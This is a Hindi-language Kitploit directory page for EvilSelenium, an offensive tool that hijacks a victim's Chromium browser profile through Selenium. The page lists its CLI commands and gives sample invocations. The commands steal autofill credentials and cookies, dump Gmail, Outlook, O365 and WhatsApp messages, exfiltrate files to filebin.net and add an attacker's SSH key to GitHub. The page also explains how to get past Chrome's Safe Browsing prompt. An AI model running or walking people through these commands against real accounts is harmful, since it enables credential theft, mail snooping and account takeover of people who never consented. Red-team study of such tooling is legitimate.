Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EvilSelenium — Selenium को हथियार बनाकर क्रेडेंशियल चोरी, कुकी डंपिंग, ईमेल एक्सफिल्ट्रेशन और Chromium ब्राउज़रों से फ़ाइल निष्कर्षण को स्वचालित करता है, जो रेड टीम ऑपरेशन के लिए है। | Kitploit
उपकरण/GitHubGitHub/mrd0x/evilselenium
फ़िशिंग उपकरणडेटा निष्कासनजानकारी एकत्र करनापोस्ट-शोषणसामाजिक इंजीनियरिंगरेड टीमिंग
GitHubmrd0x/evilselenium

EvilSelenium

Selenium को हथियार बनाकर क्रेडेंशियल चोरी, कुकी डंपिंग, ईमेल एक्सफिल्ट्रेशन और Chromium ब्राउज़रों से फ़ाइल निष्कर्षण को स्वचालित करता है, जो रेड टीम ऑपरेशन के लिए है।

रिपॉजिटरी देखें
605934 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

EvilSelenium

EvilSelenium एक नया प्रोजेक्ट है जो Chromium-आधारित ब्राउज़रों का दुरुपयोग करने के लिए Selenium को हथियार बनाता है। वर्तमान में उपलब्ध विशेषताएँ इस प्रकार हैं:

  • संग्रहीत क्रेडेंशियल्स चुराएँ (ऑटोफिल के माध्यम से)
  • कुकीज़ चुराएँ
  • वेबसाइटों के स्क्रीनशॉट लें
  • Gmail/O365 ईमेल डंप करें
  • WhatsApp संदेश डंप करें
  • फ़ाइलें डाउनलोड करें और बहिर्निकालें
  • GitHub में SSH कुंजियाँ जोड़ें

या अपनी आवश्यकताओं के अनुसार मौजूदा कार्यक्षमता का विस्तार करें (जैसे उपयोगकर्ता के GDrive/OneDrive से फ़ाइलें डाउनलोड करना)।

नोट

  1. जब यह टूल चलाया जाता है, तो यह मौजूदा ब्राउज़र प्रक्रियाओं को समाप्त कर देगा ताकि उपयोगकर्ता के ब्राउज़र प्रोफ़ाइल के साथ चल सके, जिसमें पासवर्ड और सक्रिय सत्र होते हैं।

  2. मैंने इस टूल को लगभग एक सप्ताह में बनाया और जितने परीक्षण चाहिए थे उतने नहीं किए, इसलिए कुछ बग हो सकते हैं।

  3. Selenium मॉड्यूल हमेशा स्थिर नहीं होते हैं। वेबसाइटों में लगातार बदलाव के कारण कुछ मॉड्यूल कभी-कभी टूट सकते हैं। मैं मौजूदा मॉड्यूल को बनाए रखने की पूरी कोशिश करूँगा ताकि वे इच्छित रूप से काम करें, लेकिन आपको चेतावनी दी गई है।

उपयोग

root@kitploit:~
EvilSelenium.exe /?

/help - यह सहायता मेनू दिखाएँ।

SETUP:
/install - chromedriver और Selenium webdriver इंस्टॉल करें। इसे एक बार चलाएँ।

GLOBAL: (हर कमांड के साथ स्वीकार्य)
/browserdir [appdata_local_routing] - कस्टम ब्राउज़र का उपयोग करें, इनपुट %appdatalocal% निर्देशिका के अंदर रूटिंग होना चाहिए (जैसे "Microsoft\Edge")

RECON:
/enumsavedsites [out_path] - जाँचें कि किन वेबसाइटों के लिए पासवर्ड स्क्रीनशॉट के माध्यम से सहेजे गए हैं।
/screenshot [website] [out_path] - किसी दिए गए वेबपेज का स्क्रीनशॉट लें।

CREDENTIALS:
/autorun - सामान्य वेबसाइटों से सहेजे गए क्रेडेंशियल्स निकालें।
/dynamicid [login_page] [username_id] [password_id] - किसी वेबसाइट से सहेजे गए क्रेडेंशियल्स निकालें, उपयोगकर्ता नाम फ़ील्ड ID और पासवर्ड फ़ील्ड ID प्रदान करके।
/dynamicname [login_page] [username_name] [password_name] - किसी वेबसाइट से सहेजे गए क्रेडेंशियल्स निकालें, उपयोगकर्ता नाम फ़ील्ड नाम मान और पासवर्ड नाम मान प्रदान करके।
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - किसी वेबसाइट से सहेजे गए क्रेडेंशियल्स निकालें, उपयोगकर्ता नाम फ़ील्ड नाम मान, पासवर्ड नाम मान और उनकी स्थितियाँ प्रदान करके।

COOKIES:
/cookies [website] - किसी दिए गए वेबसाइट के लिए कुकीज़ प्राप्त करता है।

MODULES:
/download [file_url] [seconds] - एक फ़ाइल डाउनलोड करें और डाउनलोड पूरा होने के लिए प्रतीक्षा करने का समय निर्दिष्ट करें। फ़ाइल एक्सटेंशन निष्पादन योग्य नहीं होने चाहिए।
/exfil [local_file] [seconds] - एक फ़ाइल को filebin.net पर अपलोड करता है और डाउनलोड लिंक आउटपुट करता है।
/gmail [out_path] [num_of_emails] - mail.google.com से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है। अधिकतम 50 ईमेल।
/outlook [out_path] [num_of_emails] - Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।
/o365 [out_path] [num_of_emails] - O365 Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।
/github [key] - अपनी SSH कुंजी GitHub में जोड़ें यदि उपयोगकर्ता प्रमाणित है।
/whatsapp [out_path] - WhatsApp संदेश प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है (BETA)।

सेटअप

/install कमांड Chrome Driver और Selenium WebDriver डाउनलोड करेगा, जो आवश्यक आवश्यकताएँ हैं। EvilSelenium Chrome संस्करण 100-90 पर काम करेगा।

Windows 10, Chrome v97 और v90 पर परीक्षण किया गया है।

root@kitploit:~
EvilSelenium.exe /install

वैश्विक कॉन्फ़िगरेशन

डिफ़ॉल्ट रूप से EvilSelenium डेटा प्राप्त करने के लिए Google Chrome के उपयोगकर्ता डेटा फ़ोल्डर का उपयोग करने का प्रयास करेगा, लेकिन अन्य Chromium-आधारित ब्राउज़र भी समर्थित हैं।
विभिन्न Chrome-आधारित ब्राउज़रों का उपयोग करने के लिए आपको %localappdata% निर्देशिका में ब्राउज़र रूटिंग के बाद /browserdir जोड़ना चाहिए। यहाँ कुछ सामान्य ब्राउज़रों के उदाहरण दिए गए हैं (किसी भी CLI कमांड में जोड़ा जाना चाहिए):

  1. Brave - /browserdir BraveSoftware\Brave-Browser
  2. Microsoft Edge - /browserdir Microsoft\Edge
  3. Vivaldi - /browserdir Vivaldi

रिकॉन मॉड्यूल

/enumsavedsites - यह chrome://settings/passwords के स्क्रीनशॉट लेगा।

/screenshot - किसी भी वेबसाइट का स्क्रीनशॉट लें। यदि उपयोगकर्ता वेबसाइट पर प्रमाणित है तो आपको प्रमाणित स्क्रीनशॉट मिलते हैं :)।

क्रेडेंशियल मॉड्यूल

महत्वपूर्ण: क्रेडेंशियल मॉड्यूल ऑटोफिल से क्रेडेंशियल्स चुराने के लिए कुकीज़ हटा देगा। आदर्श रूप से, यदि आप कुकीज़ निर्यात करना चाहते हैं तो आपको अंत में क्रेडेंशियल मॉड्यूल का उपयोग करना चाहिए।

/autorun - सामान्य वेबसाइटों के लिए पूर्व-निर्मित टेम्पलेट। मैं और जोड़ता रहूँगा।

/dynamicid - लॉगिन URL के साथ उपयोगकर्ता नाम इनपुट फ़ील्ड का ID और पासवर्ड फ़ील्ड का ID प्रदान करें। यह document.getElementById() के बराबर है।

/dynamicname - यदि फ़ील्ड में ID नहीं हैं, तो फ़ील्ड के नाम मान प्रदान करें। यह नाम मान के पहले इंडेक्स का चयन करेगा। यह document.getElementsByName()[0].value के बराबर है।

/dynamicname2 - फ़ील्ड के नाम मान उनके इंडेक्स स्थिति के साथ प्रदान करें। यह document.getElementsByName()[x].value के बराबर है जहाँ x प्रदान की गई स्थिति है।

कुकीज़ मॉड्यूल

/cookies - निर्दिष्ट वेबसाइट से कुकीज़ डंप करता है।

विविध मॉड्यूल

ये अतिरिक्त मॉड्यूल हैं जो मैंने यह प्रदर्शित करने के लिए बनाए हैं कि आप Selenium के साथ किस प्रकार की क्रियाएँ कर सकते हैं।

/download - एक फ़ाइल डाउनलोड करें और डाउनलोड के लिए प्रतीक्षा करने का समय निर्दिष्ट करें। Chrome के Safebrowsing प्रॉम्प्ट से बचने के लिए डाउनलोड करने से पहले फ़ाइल में एक गैर-निष्पादन योग्य फ़ाइल एक्सटेंशन जोड़ा जाना चाहिए।

/exfil - filebin.net पर एक फ़ाइल अपलोड करता है और अपलोड पूरा होने के लिए समय निर्दिष्ट करें। एक बार अपलोड पूरा हो जाने पर फ़ाइल का डाउनलोड लिंक लिखा जाता है।

/gmail - mail.google.com से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है। अधिकतम 50 ईमेल।

/outlook - Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।

/o365 - O365 Outlook से ईमेल प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है।

/github - अपनी SSH कुंजी GitHub में जोड़ें यदि उपयोगकर्ता प्रमाणित है।

/whatsapp - WhatsApp संदेश प्राप्त करता है यदि उपयोगकर्ता प्रमाणित है (BETA)।

नमूना कमांड

root@kitploit:~
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads

EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password

EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password

डेमो

Example

समर्थन

  • मुझे ट्विटर पर फ़ॉलो करें @mrd0x
  • BTC Wallet: 38ApE9ciNHiXzEaQExLXdwM6TrEpz2wCUi (जाहिर है कॉफी के लिए)
टूल डाउनलोड करें